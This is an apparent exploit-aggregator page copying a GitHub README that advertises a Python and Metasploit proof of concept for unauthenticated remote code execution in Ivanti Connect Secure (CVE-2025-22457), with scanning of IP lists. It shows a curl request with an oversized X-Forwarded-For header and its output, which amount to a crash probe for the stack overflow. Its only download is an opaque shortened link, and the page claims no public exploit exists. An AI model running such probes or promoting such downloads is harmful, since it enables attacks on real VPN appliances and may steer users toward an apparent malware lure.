CVE-2025-22457 PoC — Ivanti Connect Secure 安全漏洞

Source

https://github.com/N4SL1/CVE-2025-22457-PoC

Associated Vulnerability

Title:Ivanti Connect Secure 安全漏洞 (CVE-2025-22457)
Description:Ivanti Connect Secure（ICS）是美国Ivanti公司的一款安全远程网络连接工具。 Ivanti Connect Secure存在安全漏洞，该漏洞源于栈缓冲区溢出，可能导致远程代码执行。

Description

CVE-2025-22457 Python and Metasploit PoC for Ivanti unauthenticated RCE

Readme

# CVE-2025-22457-PoC
CVE-2025-22457 Python and Metasploit PoC for Ivanti unauthenticated RCE

# CVE-2025-22457 A stack-based buffer overflow in Ivanti Connect Secure allows a remote unauthenticated attacker to achieve remote code execution.


PoC for achieving RCE in Ivanti Connect Secure Appliances<br>
PoC is both in Python and a metasploit module (more advanced payload for meterpreter)<br>
Python script is designed to work with a single ip and list of ips which can also save the results into a file<br>

Note: yet no public exploit is developed/disclosed and most probably it wont in near future cause of the impact.



# Download: [here](https://bit.ly/3EgljKT)


```
$ curl -v --insecure https://HOST --header X-Forwarded-For:A * 856
*   Trying HOST:443...
* Connected to HOST (HOST) port 443
* using HTTP/1.x
> GET / HTTP/1.1
> Host: HOST
> User-Agent: curl/8.10.1
> Accept: */*
> X-Forwarded-For:A * 856
>
* Request completely sent off
* schannel: server closed abruptly (missing close_notify)
* closing connection #0
curl: (56) Failure when receiving data from the peer
```

File Snapshot


 [4.0K]  /data/pocs/d7a13d7fb9d123e533c740d0a74fb7e7884a23b8
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!